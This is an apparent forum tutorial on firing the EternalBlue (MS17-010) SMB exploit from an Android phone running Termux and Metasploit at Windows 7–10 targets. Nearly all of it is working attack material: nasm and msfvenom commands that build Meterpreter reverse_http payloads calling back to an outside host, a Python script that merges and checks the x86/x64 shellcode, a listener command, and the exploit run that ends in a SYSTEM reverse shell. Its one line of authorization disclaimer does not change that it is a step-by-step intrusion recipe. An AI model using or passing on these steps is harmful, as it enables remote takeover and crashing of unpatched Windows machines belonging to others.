[Tutorial]: MS17-010 in Android world
In this tutorial I'll show you how to use the exploit known as "Eternalblue" (MS17-010) to attack Windows 7 through Windows 10 from an Android phone.
First of all, I recommend that you learn what Eternalblue is and HOW the exploit works before trying this. It is an SMBv1 kernel exploit: when it fails, the target usually blue-screens, so only run it against machines you own or are authorized to test. I'm not responsible for your actions. Be careful.
In this tutorial I used:
Asus ZC553KL with Android 7.0 (Nougat) [192.168.1.7]
Windows 7 Ultimate 64-bit (VirtualBox) [192.168.1.10]
Termux app (https://termux.com/)
Kali Linux (x86)
Hacker's Keyboard app (Android)
STARTING
First of all, download the Termux app (from the Play Store) and install it.
You can learn a lot about using Termux on this blog.
Link: https://gauravssnl.wordpress.com/2017/01/15/how-to-use-termux-app-for-android-terminal-emulator-and-linux-environment/
After Termux is updated, you have to install our friend metasploit-framework.
Use this script to install it: https://github.com/verluchie/termux-metasploit
Type the following commands:
Android:$ apt-get install git
Android:$ git clone https://github.com/verluchie/termux-metasploit
Android:$ cd termux-metasploit
Android:$ chmod +x install.sh
Android:$ sh install.sh
(chmod +x is enough; there is no reason to make the script world-writable with 777, and since it is run through sh the execute bit is not even required.)
IF YOU GET AN ERROR, PLEASE READ THE README IN THAT GITHUB REPOSITORY. I'M NOT THE DEVELOPER.
DOWNLOADING EXPLOIT ON KALI LINUX
Download the exploit here: https://github.com/worawit/MS17-010
Now, on your Linux machine, you need to build the .bin shellcode that the exploit sends to the target (calm down, you will understand later). This needs nasm, to assemble the kernel shellcode, and msfvenom, for the userland payload; both are available on Kali.
root@kali:~/MS17-010/shellcode# pwd
/root/MS17-010/shellcode
root@kali:~/MS17-010/shellcode# ls
eternalblue_kshellcode_x64.asm
eternalblue_kshellcode_x86.asm
eternalblue_sc_merge.py
root@kali:~/MS17-010/shellcode# nasm -f bin eternalblue_kshellcode_x64.asm
root@kali:~/MS17-010/shellcode# nasm -f bin eternalblue_kshellcode_x86.asm
Now the Eternalblue kernel shellcode is assembled. nasm -f bin writes a raw binary next to each .asm file, named after it with the extension dropped:
root@kali:~/MS17-010/shellcode# ls
eternalblue_kshellcode_x64
eternalblue_kshellcode_x64.asm
eternalblue_kshellcode_x86
eternalblue_kshellcode_x86.asm
eternalblue_sc_merge.py
Next we need the userland payload that actually gives us the reverse shell. The kernel shellcode runs inside the Windows kernel; the Meterpreter stager appended to it is what ends up running in user mode and connecting back to us.
root@kali:~/MS17-010/shellcode# msfvenom -p windows/meterpreter/reverse_http EXITFUNC=thread LHOST=dummynet.zzux.com LPORT=5151 -f raw -o sc_x86_msf.bin
root@kali:~/MS17-010/shellcode# msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LHOST=dummynet.zzux.com LPORT=5151 -f raw -o sc_x64_msf.bin
You only need to change LHOST and LPORT. LHOST is where the target will call back, so it must point at the phone: on a LAN the phone's address (192.168.1.7 here) is enough; a dynamic DNS name like the one above (you can create one at https://www.changeip.com) is only needed if the target has to reach the phone over the internet. Keep -f raw: the exploit expects plain shellcode bytes, not a C array or an executable.
Cool, at this point we have the payload and the Eternalblue kernel shellcode; let's put them together. Order matters: the kernel shellcode comes first and the userland payload is appended to it, once for each architecture. The merge script then joins the x86 and x64 blobs into a single file that works whichever of the two the target turns out to be.
root@kali:~/MS17-010/shellcode# cat eternalblue_kshellcode_x64 sc_x64_msf.bin > sc_x64.bin
root@kali:~/MS17-010/shellcode# cat eternalblue_kshellcode_x86 sc_x86_msf.bin > sc_x86.bin
root@kali:~/MS17-010/shellcode# python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
OK, with those commands we have created the final shellcode, sc_all.bin, for our exploit.
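To see what the cat and merge steps above actually produce, here is an added example (my own code, not the worawit/MS17-010 repository's eternalblue_sc_merge.py) that builds the combined x86/x64 blob and, more usefully, checks an existing sc_all.bin before you fire it at a target. It assumes the standard nine-byte architecture-switch stub (xor eax,eax / inc eax / jz rel32) in front of the x86 part; the page does not show the merge script's contents, so treat that layout, the file name merge_check.py and the --check flag as my assumptions. The demo bytes at the bottom are constructed filler, not real shellcode.

```python
#!/usr/bin/env python3
# Added example, not the worawit/MS17-010 repo's own eternalblue_sc_merge.py:
# builds the combined x86/x64 blob (what the tutorial calls sc_all.bin) and
# checks an existing one before it is copied to the phone.
#
# Assumed layout of the merged file:  [9-byte stub][sc_x86][sc_x64]
# The stub is the classic "same bytes, both modes" architecture switch:
#   31 c0              xor eax, eax     ; ZF = 1 in both 32- and 64-bit mode
#   40                 inc eax          ; 32-bit: eax = 1, ZF = 0
#                                       ; 64-bit: 0x40 is a REX prefix, eax stays 0, ZF stays 1
#   0f 84 <rel32>      jz  +len(sc_x86) ; 64-bit: taken, lands on sc_x64
#                                       ; 32-bit: not taken, falls through into sc_x86
# rel32 is relative to the end of the jz, i.e. to the first byte of sc_x86.
import struct
import sys

STUB_PREFIX = b"\x31\xc0\x40\x0f\x84"   # xor eax,eax ; inc eax ; jz (opcode only)
STUB_LEN = len(STUB_PREFIX) + 4          # + 4-byte little-endian displacement = 9


def merge_shellcode(sc_x86: bytes, sc_x64: bytes) -> bytes:
    """Join an x86 blob and an x64 blob behind the arch-switch stub."""
    if not sc_x86 or not sc_x64:
        raise ValueError("both shellcode blobs must be non-empty")
    if len(sc_x86) > 0x7FFFFFFF:
        raise ValueError("x86 blob too large for a rel32 jump")
    return STUB_PREFIX + struct.pack("<I", len(sc_x86)) + sc_x86 + sc_x64


def split_merged(blob: bytes):
    """Parse a merged blob back into (sc_x86, sc_x64); ValueError if the stub is wrong."""
    if len(blob) < STUB_LEN or blob[: len(STUB_PREFIX)] != STUB_PREFIX:
        raise ValueError("no arch-switch stub at offset 0: not a merged file")
    (x86_len,) = struct.unpack("<I", blob[len(STUB_PREFIX):STUB_LEN])
    body = blob[STUB_LEN:]
    if x86_len == 0 or x86_len >= len(body):
        raise ValueError("stub says x86 part is %d bytes but only %d follow"
                         % (x86_len, len(body)))
    return body[:x86_len], body[x86_len:]


def is_merged(blob: bytes) -> bool:
    """True if blob parses as stub + x86 + x64 (the check to run on the phone after wget)."""
    try:
        split_merged(blob)
        return True
    except ValueError:
        return False


def build_all(kshell_x86: bytes, payload_x86: bytes,
              kshell_x64: bytes, payload_x64: bytes) -> bytes:
    """The tutorial's two cat steps plus the merge in one call:
    kernel shellcode first, userland payload appended, per architecture."""
    return merge_shellcode(kshell_x86 + payload_x86, kshell_x64 + payload_x64)


if __name__ == "__main__":
    # usage: merge_check.py sc_x86.bin sc_x64.bin sc_all.bin   (build)
    #        merge_check.py --check sc_all.bin                  (inspect)
    if len(sys.argv) == 3 and sys.argv[1] == "--check":
        data = open(sys.argv[2], "rb").read()
        x86, x64 = split_merged(data)
        print("ok: stub + %d bytes x86 + %d bytes x64" % (len(x86), len(x64)))
    elif len(sys.argv) == 4:
        out = merge_shellcode(open(sys.argv[1], "rb").read(),
                              open(sys.argv[2], "rb").read())
        open(sys.argv[3], "wb").write(out)
        print("wrote %d bytes to %s" % (len(out), sys.argv[3]))
    else:
        # Constructed demo data (not real shellcode): NOPs for the kernel part,
        # INT3s for the payload, so the round trip is easy to eyeball in a hex dump.
        blob = build_all(b"\x90" * 8, b"\xcc" * 4, b"\x90" * 16, b"\xcc" * 6)
        x86, x64 = split_merged(blob)
        print(blob[:STUB_LEN].hex(), len(x86), len(x64))
```

Running `python3 merge_check.py --check sc_all.bin` on the phone after the download is a cheap way to catch a truncated or wrong file: if the stub is missing or the x86 length in it does not fit the file, the script refuses it, which is much better than finding out via a blue screen on the target.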
sc_all.bin must be copied to Termux on the phone, because the exploit runs from there. The exploit script itself, eternalblue_exploit7.py, and its helper mysmb.py from the same repository have to be on the phone as well (mysmb.py imports impacket, so install that for Python 2 in Termux). One easy way to copy the files is to serve them from your Linux machine:
root@kali:~/MS17-010/shellcode# python -m SimpleHTTPServer 80
and in Termux:
Android:$ wget http://<ip>/sc_all.bin
(<ip> is the Kali machine's address. Compare the sha256sum of sc_all.bin on both sides before going on: a truncated shellcode file is a good way to blue-screen the target for nothing.)
Turn ON the Windows machine and leave it for now.
On the phone, start the Metasploit listener and leave it waiting in one terminal. Press Ctrl+Alt+C in Termux to open a second session for the exploit (Ctrl+Alt+N switches to the next session). The handler's payload must match what you built with msfvenom and the architecture of the target: windows/x64/meterpreter/reverse_http for the 64-bit Windows 7 used here, windows/meterpreter/reverse_http for a 32-bit target.
Command used:
Android:$ msfconsole -x "use multi/handler; set payload windows/x64/meterpreter/reverse_http; set lhost dummynet.zzux.com; set lport 5151; set AUTORUNSCRIPT post/windows/manage/migrate; exploit" -q
And run our exploit:
Command used:
Android:$ python2.7 eternalblue_exploit7.py 192.168.1.10 sc_all.bin 1
The arguments are the target IP, the merged shellcode file and, optionally, the number of groom connections (the script's default is 13).
PS: I'd recommend putting 1 at the end, because if you use more, Windows will crash.
Exploit executed.
nt authority\system reverse shell \o/
EXPLOITS
eternalblue_exploit7.py
Windows versions affected:
- Windows 7 SP1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x86
- Windows 2008 SP1 x64
- Windows 2008 SP1 x86
eternalblue_exploit8.py
Windows versions affected:
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 10 Pro Build 10240 x64
Another way to run this exploit is the ms17_010_eternalblue module in metasploit-framework (you still set the target and the listener options, and the payload, as usual):
Android:$ msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue" -q
Windows versions affected:
- Windows Server 2008 R2 (x64) All Service Packs
- Windows 7
Thanks guys, see you in the next post. \o
Just Awesome !